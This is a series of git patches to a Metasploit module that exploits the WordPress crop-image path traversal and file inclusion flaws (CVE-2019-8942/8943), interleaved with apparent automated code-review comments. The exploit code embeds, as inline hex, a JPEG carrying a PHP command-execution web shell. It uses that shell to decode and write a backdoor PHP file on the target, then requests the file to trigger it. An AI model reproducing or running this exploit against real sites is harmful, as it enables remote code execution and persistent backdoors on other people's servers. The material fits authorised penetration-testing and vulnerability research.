z@o!R7564QtZ8=s2hLFHNC6j(`a(uIIK*I`Un2%p$win}#_qKcQrlJC)d6n=;O2GCCpZVRII0-?oE4im)~Q(gH7?G-S-fU5#~d$m6poRR|0KAA@2sZ 
z`sB>R)U?B>meO06`!SfpfV%F$xqnctqmtVi`T@e`~C+VRlUCe diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index 86a3eef3db..b01b8a9a9d 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb 
@@ -132,9 +132,39 @@ class MetasploitModule < Msf::Exploit::Remote a_nonce end - def upload_file(tmp_filename, img_name, wp_nonce, cookie) - path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename) - img_data = File.read(path) + def upload_file(img_name, wp_nonce, cookie) + img_data = %w[ + FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F + 74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00 + 10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00 + 3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69 + 6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D + 20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09 + 08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D + 27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06 + 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 + 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 + 24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF + C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 + 07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01 + 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1 + 15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38 + 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73 + 74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4 + A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4 + D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF + C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 + 07 08 09 0A 0B 
FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 + 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09 + 23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37 + 38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A + 73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 + A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 + D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF + DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B + 3F 3E + ] + img_data = [img_data.join].pack('H*') img_name += '.jpg' boundary = "#{rand_text_alphanumeric(rand(10) + 5)}" @@ -357,11 +387,10 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Preparing payload...") @current_theme = get_current_theme wp_nonce = get_wpnonce(cookie) - tmp_filename = "evilshell.jpg" @current_date = Time.now.strftime("%Y/%m/") img_name = Rex::Text.rand_text_alpha(10) - @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie) + @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie) ajax_nonce = get_ajaxnonce(cookie) @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie) From d5ac1e3a334232ec0f35e8afc55bf0c86de2303d Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 3 Apr 2019 19:03:47 -0500 Subject: [PATCH 11/16] minor adjustments to indentation and requests --- modules/exploits/multi/http/wp_crop_rce.rb | 76 +++++++++++----------- 1 file changed, 38 insertions(+), 38 deletions(-) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index b01b8a9a9d..610a60ce41 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb 
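Review bot: The inline byte list added to `upload_file` has no comment saying what it is or where it came from, so a reader cannot audit it without decoding the hex by hand. Since it replaces the file read from `data/exploits/CVE-2019-8942/`, a line such as `# JPEG template formerly shipped as data/exploits/CVE-2019-8942/evilshell.jpg, inlined as hex` above the array would record the provenance. The array is also rebuilt and re-packed on every call, and `img_data` changes from an Array to a String on the `pack('H*')` line; a frozen module-level constant for the hex and a separate local for the packed bytes would read more clearly. `upload_file` continues past the end of this hunk.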
@@ -10,42 +10,42 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) - super(update_info( - info, - 'Name' => 'WordPress Crop-image Shell Upload', - 'Description' => %q{ - This module exploits a path traversal and a local file inclusion - vulnerability on WordPress versions 5.0.0 and <= 4.9.8. - The crop-image function allows a user, with at least author privileges, - to resize an image and perform a path traversal by changing the _wp_attached_file - reference during the upload. The second part of the exploit will include - this image in the current theme by changing the _wp_page_template attribute - when creating a post. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'RIPSTECH Technology', # Discovery - 'Wilfried Becard ' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2019-8942' ], - [ 'CVE', '2019-8943' ], - [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/'] - ], - 'DisclosureDate' => 'Feb 19 2019', - 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Targets' => [['WordPress', {}]], - 'DefaultTarget' => 0 - )) + super(update_info( + info, + 'Name' => 'WordPress Crop-image Shell Upload', + 'Description' => %q{ + This module exploits a path traversal and a local file inclusion + vulnerability on WordPress versions 5.0.0 and <= 4.9.8. + The crop-image function allows a user, with at least author privileges, + to resize an image and perform a path traversal by changing the _wp_attached_file + reference during the upload. The second part of the exploit will include + this image in the current theme by changing the _wp_page_template attribute + when creating a post. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'RIPSTECH Technology', # Discovery + 'Wilfried Becard ' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2019-8942' ], + [ 'CVE', '2019-8943' ], + [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/'] + ], + 'DisclosureDate' => 'Feb 19 2019', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['WordPress', {}]], + 'DefaultTarget' => 0 + )) - register_options( - [ - OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), - OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) - ]) + register_options( + [ + OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), + OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) + ]) end def check @@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote def get_current_theme uri = normalize_uri(datastore['TARGETURI']) - res = send_request_cgi( + res = send_request_cgi!( 'method' => 'GET', 'uri' => uri ) @@ -408,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote uri = normalize_uri(datastore['TARGETURI']) # Test if base64 is on target test_string = 'YmFzZTY0c3BvdHRlZAo=' - res = send_request_cgi( + res = send_request_cgi!( 'method' => 'GET', 'uri' => uri, 'cookie' => cookie, @@ -422,7 +422,7 @@ class MetasploitModule < Msf::Exploit::Remote # Execute payload with base64 decode @backdoor = Rex::Text.rand_text_alpha(10) encoded = Rex::Text.encode_base64(payload.encoded) - res = send_request_cgi( + res = send_request_cgi!( 'method' => 'GET', 'uri' => uri, 'cookie' => cookie, From 2710c422c255fcdfdf0feeb748e78150c7288353 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Apr 2019 10:08:31 -0700 Subject: [PATCH 12/16] Bump version of framework to 5.0.16 --- Gemfile.lock | 8 ++++---- LICENSE_GEMS | 8 ++++---- lib/metasploit/framework/version.rb | 2 +- 3 files changed, 9 insertions(+), 9 deletions(-) 
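Review bot: The switch from `send_request_cgi` to `send_request_cgi!` in `get_current_theme` is not explained, and the same change is made to both requests in the hunks at -408 and -422. The bang variant follows redirects and those two later requests carry the session `cookie`, so it is worth confirming that a redirect cannot carry the cookie to a host other than the configured one. A short comment such as `# follow the redirect issued for the site root` (if that is the reason) would tell the next maintainer why the variants differ between functions. All three enclosing methods start and end outside their hunks.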
diff --git a/Gemfile.lock b/Gemfile.lock index 87fb2a2476..775b0ea144 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (5.0.15) + metasploit-framework (5.0.16) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -113,7 +113,7 @@ GEM activerecord (>= 3.1.0, < 6) backports (3.12.0) bcrypt (3.1.12) - bcrypt_pbkdf (1.0.0) + bcrypt_pbkdf (1.0.1) bindata (2.4.4) bit-struct (0.16) builder (3.2.3) @@ -201,7 +201,7 @@ GEM nexpose (7.2.1) nokogiri (1.10.2) mini_portile2 (~> 2.4.0) - octokit (4.13.0) + octokit (4.14.0) sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.2) openvas-omp (0.0.4) @@ -361,7 +361,7 @@ GEM activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.18) + yard (0.9.19) PLATFORMS ruby diff --git a/LICENSE_GEMS b/LICENSE_GEMS index e64c967c75..f1038a5cb9 100644 --- a/LICENSE_GEMS +++ b/LICENSE_GEMS @@ -11,7 +11,7 @@ arel, 6.0.4, MIT arel-helpers, 2.8.0, MIT backports, 3.12.0, MIT bcrypt, 3.1.12, MIT -bcrypt_pbkdf, 1.0.0, MIT +bcrypt_pbkdf, 1.0.1, MIT bindata, 2.4.4, ruby bit-struct, 0.16, ruby builder, 3.2.3, MIT @@ -44,7 +44,7 @@ loofah, 2.2.3, MIT metasm, 1.0.3, LGPL metasploit-concern, 2.0.5, "New BSD" metasploit-credential, 3.0.3, "New BSD" -metasploit-framework, 5.0.15, "New BSD" +metasploit-framework, 5.0.16, "New BSD" metasploit-model, 2.0.4, "New BSD" metasploit-payloads, 1.3.65, "3-clause (or ""modified"") BSD" metasploit_data_models, 3.0.8, "New BSD" @@ -60,7 +60,7 @@ net-ssh, 5.2.0, MIT network_interface, 0.0.2, MIT nexpose, 7.2.1, "New BSD" nokogiri, 1.10.2, MIT -octokit, 4.13.0, MIT +octokit, 4.14.0, MIT openssl-ccm, 1.2.2, MIT openvas-omp, 0.0.4, MIT packetfu, 1.1.13, BSD @@ -133,4 +133,4 @@ warden, 1.2.7, MIT windows_error, 0.1.2, BSD xdr, 2.0.0, "Apache 2.0" xmlrpc, 0.3.0, ruby -yard, 0.9.18, MIT +yard, 0.9.19, MIT diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 1304ebda59..fac5410e0a 100644 
--- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "5.0.15" + VERSION = "5.0.16" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 2884d9afcb2b0f4971dbda09aa3bc74d398cf849 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 4 Apr 2019 15:09:12 -0500 Subject: [PATCH 13/16] modified checks, added function --- modules/exploits/multi/http/wp_crop_rce.rb | 197 ++++++++++----------- 1 file changed, 97 insertions(+), 100 deletions(-) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index 610a60ce41..3884ae4852 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb @@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie ) - if res && res.code == 200 && res.body && res.body.length > 0 + if res && res.code == 200 && res.body && !res.body.empty? res.get_hidden_inputs.first["_wpnonce"] end end @@ -85,11 +85,11 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie, 'vars_get' => { - 'post' => "#{image_id}", + 'post' => image_id, 'action' => "edit" } ) - if res && res.code == 200 && res.body && res.body.length > 0 + if res && res.code == 200 && res.body && !res.body.empty? tmp = res.get_hidden_inputs wpnonce2 = tmp[1].first[1] end @@ -101,7 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => uri ) - fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && res.body.length > 0 + fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty? theme = res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme 
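Review bot: `get_wpnonce` (hunk -73) still falls through and returns nil when the response check fails, while the other helpers touched in this commit now call `fail_with`; the hunk at -85 has the same shape. On the success path `res.get_hidden_inputs.first["_wpnonce"]` would raise NoMethodError if the page yields no hidden inputs, presumably because `first` is then nil. Using the sibling guard, e.g. `fail_with(Failure::NotFound, 'Unable to retrieve the wpnonce') unless res && res.code == 200 && res.body && !res.body.empty?`, followed by a nil check on the first input set, would keep every failure explicit. Both methods begin outside their hunks.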
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote 'query[paged]' => '1' } ) - fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && res.body.length > 0 + fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty? a_nonce = res.body.scan(/"edit":"(\w+)"/).flatten.first fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce @@ -192,14 +192,13 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => post_data, 'cookie' => cookie ) - if res && res.code == 200 && res.body && res.body.length > 0 - print_good("Image uploaded") - res = JSON.parse(res.body) - image_id = res["data"]["id"] - update_nonce = res["data"]["nonces"]["update"] - filename = res["data"]["filename"] - return filename, image_id, update_nonce - end + fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty? + print_good("Image uploaded") + res = JSON.parse(res.body) + image_id = res["data"]["id"] + update_nonce = res["data"]["nonces"]["update"] + filename = res["data"]["filename"] + return filename, image_id, update_nonce end def image_editor(img_name, ajax_nonce, image_id, cookie) @@ -218,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote 'do' => 'save' } ) - fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && res.body.length > 0 + fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty? filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename 
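Review bot: In the -192 hunk, `JSON.parse(res.body)` and the `res["data"][...]` lookups run on whatever the server returned, so a non-JSON body or a reply without a `data` hash surfaces as a ParserError or NoMethodError instead of the `fail_with` used one line earlier. The response variable `res` is also rebound to the parsed hash, which makes the following lines harder to read. Parsing into a separate local and checking its shape keeps the error path uniform. `upload_file` begins outside this hunk.

```ruby
fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?
begin
  upload = JSON.parse(res.body)
rescue JSON::ParserError
  fail_with(Failure::UnexpectedReply, 'Upload response was not valid JSON')
end
data = upload.is_a?(Hash) ? upload['data'] : nil
fail_with(Failure::UnexpectedReply, 'Upload response is missing the expected fields') unless data.is_a?(Hash) && data['nonces'].is_a?(Hash)
print_good("Image uploaded")
return data['filename'], data['id'], data['nonces']['update']
```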
@@ -267,7 +266,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri, 'cookie' => cookie ) - if res && res.code == 200 && res.body && res.body.length > 0 + if res && res.code == 200 && res.body && !res.body.empty? wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id 
@@ -287,38 +286,73 @@ class MetasploitModule < Msf::Exploit::Remote 'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg" } ) - if res && res.code == 302 - post_id - end + fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302 + post_id end end + def check_for_base64(cookie, post_id) + uri = normalize_uri(datastore['TARGETURI']) + # Test if base64 is on target + test_string = 'YmFzZTY0c3BvdHRlZAo=' + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => post_id, + '0' => "echo #{test_string} | base64 -d" + } + ) + fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty? + + fail_with(Failure::NotFound, "Can't find base64 decode on target") unless res.body.include?("base64spotted") + # Execute payload with base64 decode + @backdoor = Rex::Text.rand_text_alpha(10) + encoded = Rex::Text.encode_base64(payload.encoded) + res = send_request_cgi!( + 'method' => 'GET', + 'uri' => uri, + 'cookie' => cookie, + 'vars_get' => { + 'p' => post_id, + '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" + } + ) + + fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty? 
+ send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php"), + 'cookie' => cookie + ) + end + def wp_cleanup(shell_name, post_id, cookie) + print_status('Attempting to clean up files...') uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php') res = send_request_cgi( 'method' => 'POST', 'uri' => uri, 'cookie' => cookie, - 'vars_post' => { - 'action' => "query-attachments" - } + 'vars_post' => { 'action' => "query-attachments" } ) - if res && res.code == 200 && res.body && res.body.length > 0 - infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten - id1, id2, id3 = infos[0], infos[2], infos[4] - delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5] - for i in (0...6).step(2) - res = send_request_cgi( - 'method' => 'POST', - 'uri' => uri, - 'cookie' => cookie, - 'vars_post' => { - 'action' => "delete-post", - 'id' => "#{infos[i]}", - '_wpnonce' => "#{infos[i+1]}" - } - ) - end + + fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty? + infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten + id1, id2, id3 = infos[0], infos[2], infos[4] + delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5] + for i in (0...6).step(2) + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'cookie' => cookie, + 'vars_post' => { + 'action' => "delete-post", + 'id' => infos[i], + '_wpnonce' => infos[i+1] + } + ) end uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php') 
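Review bot: In `wp_cleanup`, the result of `res.body.scan(...)` is used without checking that it matched: when the listing does not contain all three file names in that order, `infos` is empty and the loop still sends three `delete-post` requests with nil `id` and `_wpnonce`. Check `infos.length == 6` first and report the miss with `print_warning`, so the leftover attachments can be removed by hand and noted in the engagement record. `id1`..`id3` and `delete_nonce1`..`delete_nonce3` are not read anywhere in the visible part of the method and can go, and `infos.each_slice(2) { |id, nonce| ... }` would replace the `for i in (0...6).step(2)` index arithmetic. `wp_cleanup` continues past the end of this hunk.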
@@ -328,7 +362,7 @@ class MetasploitModule < Msf::Exploit::Remote 'cookie' => cookie ) - if res && res.code == 200 && res.body && res.body.length > 0 + if res && res.code == 200 && res.body && !res.body.empty? post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\w+)/).flatten.first fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php') @@ -338,39 +372,38 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => uri2, 'cookie' => cookie, 'vars_get' => { - 'post' => "#{post_id}", + 'post' => post_id, 'action' => 'trash', - '_wpnonce' => "#{post_nonce}" + '_wpnonce' => post_nonce } ) - if res && res.code == 302 - res = send_request_cgi( + fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302 + res = send_request_cgi( + 'method' => 'GET', + 'uri' => uri1, + 'cookie' => cookie, + 'vars_get' => { + 'post_status' => "trash", + 'post_type' => 'post', + '_wpnonce' => post_nonce + } + ) + + if res && res.code == 200 && res.body && !res.body.empty? + nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first + fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce + + send_request_cgi( 'method' => 'GET', - 'uri' => uri1, + 'uri' => uri2, 'cookie' => cookie, 'vars_get' => { - 'post_status' => "trash", - 'post_type' => 'post', - '_wpnonce' => "#{post_nonce}" + 'post' => post_id, + 'action' => 'delete', + '_wpnonce' => nonce } ) - - if res && res.code == 200 && res.body && res.body.length > 0 - nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\w+)/).flatten.first - fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce - - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri2, - 'cookie' => cookie, - 'vars_get' => { - 'post' => "#{post_id}", - 'action' => 'delete', - '_wpnonce' => "#{nonce}" - } - ) - end end end end 
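Review bot: In the `@@ -338,39 +372,38 @@` hunk, `fail_with(Failure::NotFound, 'Unable to retrieve response')` now raises from inside the cleanup path, which the last hunk of this patch calls after `check_for_base64`. A missing 302 on the trash step is therefore reported as a failed run, with a message that names neither the step nor the post. Since this is best-effort cleanup, `print_warning("Could not move post #{post_id} to trash; remove it manually")` followed by `return` tells the operator exactly what is left on the tested site. If the raise is kept, `Failure::UnexpectedReply` (already used in the upload hunk) describes a wrong status code better than `Failure::NotFound`. `wp_cleanup` starts above this hunk.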
@@ -405,44 +438,8 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Including into theme") post_id = include_theme(@shell_name, cookie) - uri = normalize_uri(datastore['TARGETURI']) - # Test if base64 is on target - test_string = 'YmFzZTY0c3BvdHRlZAo=' - res = send_request_cgi!( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{test_string} | base64 -d" - } - ) - if res && res.code == 200 && res.body && res.body.length > 0 - if res.body.include?("base64spotted") - # Execute payload with base64 decode - @backdoor = Rex::Text.rand_text_alpha(10) - encoded = Rex::Text.encode_base64(payload.encoded) - res = send_request_cgi!( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie, - 'vars_get' => { - 'p' => "#{post_id}", - '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php" - } - ) - if res && res.code == 200 && res.body && res.body.length > 0 - uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php") - res = send_request_cgi( - 'method' => 'GET', - 'uri' => uri, - 'cookie' => cookie - ) - end - else - print_status("Can't find base64 decode on target.") - end - end + + check_for_base64(cookie, post_id) wp_cleanup(@shell_name, post_id, cookie) end From 6efd80e1397d83ea4866c8cb68ec5182f21aa0f8 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Thu, 4 Apr 2019 15:19:58 -0500 Subject: [PATCH 14/16] added note in info --- modules/exploits/multi/http/wp_crop_rce.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb index 3884ae4852..60bb34f034 100644 --- a/modules/exploits/multi/http/wp_crop_rce.rb +++ b/modules/exploits/multi/http/wp_crop_rce.rb 
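Review bot: With the base64 logic moved into `check_for_base64`, every failure there now goes through `fail_with`, which raises, so the `wp_cleanup(@shell_name, post_id, cookie)` call on the next line is skipped. The removed code only printed a status when `base64` was missing and still reached the cleanup call. After this change the uploaded images and the created post stay on the tested site whenever that step fails. Wrapping the two calls in `begin` / `ensure` / `end`, with `wp_cleanup(@shell_name, post_id, cookie)` in the `ensure` branch, keeps the cleanup on every path. The enclosing method starts above the hunk.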
@@ -21,6 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. + + This exploit module only works for Unix-based systems currently. }, 'License' => MSF_LICENSE, 'Author' => From 0c7e589db8f645c7daeb9c29f01118b9f1786570 Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 4 Apr 2019 13:32:00 -0700 Subject: [PATCH 15/16] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 47 +++++++++++++++++++++++++++++++++++ 1 file changed, 47 insertions(+) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 9203dbcb82..0ab3466a0b 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json 
@@ -66645,6 +66645,53 @@ "notes": { } }, + "exploit_multi/http/wp_crop_rce": { + "name": "WordPress Crop-image Shell Upload", + "full_name": "exploit/multi/http/wp_crop_rce", + "rank": 600, + "disclosure_date": "2019-02-19", + "type": "exploit", + "author": [ + "RIPSTECH Technology", + "Wilfried Becard " + ], + "description": "This module exploits a path traversal and a local file inclusion\n vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n The crop-image function allows a user, with at least author privileges,\n to resize an image and perform a path traversal by changing the _wp_attached_file\n reference during the upload. The second part of the exploit will include\n this image in the current theme by changing the _wp_page_template attribute\n when creating a post.\n\n This exploit module only works for Unix-based systems currently.", + "references": [ + "CVE-2019-8942", + "CVE-2019-8943", + "URL-https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "WordPress" + ], + "mod_time": "2019-04-04 15:19:58 +0000", + "path": "/modules/exploits/multi/http/wp_crop_rce.rb", + "is_install_path": true, + "ref_name": "multi/http/wp_crop_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + } + }, "exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": { "name": "WordPress Ninja Forms Unauthenticated File Upload", "full_name": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", From b2be6bb75caff4a56336edc37fb1092fb641395c Mon Sep 17 00:00:00 2001 From: Metasploit Date: Sat, 6 Apr 2019 13:52:56 -0700 Subject: [PATCH 16/16] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 0ab3466a0b..1cc104949a 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -106985,7 +106985,7 @@ "targets": [ "Windows Powershell" ], - "mod_time": "2018-08-20 18:08:19 +0000", + "mod_time": "2019-03-29 18:14:56 +0000", "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb", "is_install_path": true, "ref_name": "windows/http/octopusdeploy_deploy", @@ -112918,7 +112918,7 @@ "targets": [ "Automatic" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2019-03-29 18:14:56 +0000", "path": "/modules/exploits/windows/local/registry_persistence.rb", "is_install_path": true, "ref_name": "windows/local/registry_persistence", @@ -113250,7 +113250,7 @@ "targets": [ "Automatic" ], - "mod_time": "2017-07-24 06:26:21 +0000", + "mod_time": "2019-03-29 18:14:56 +0000", "path": "/modules/exploits/windows/local/wmi.rb", "is_install_path": true, "ref_name": 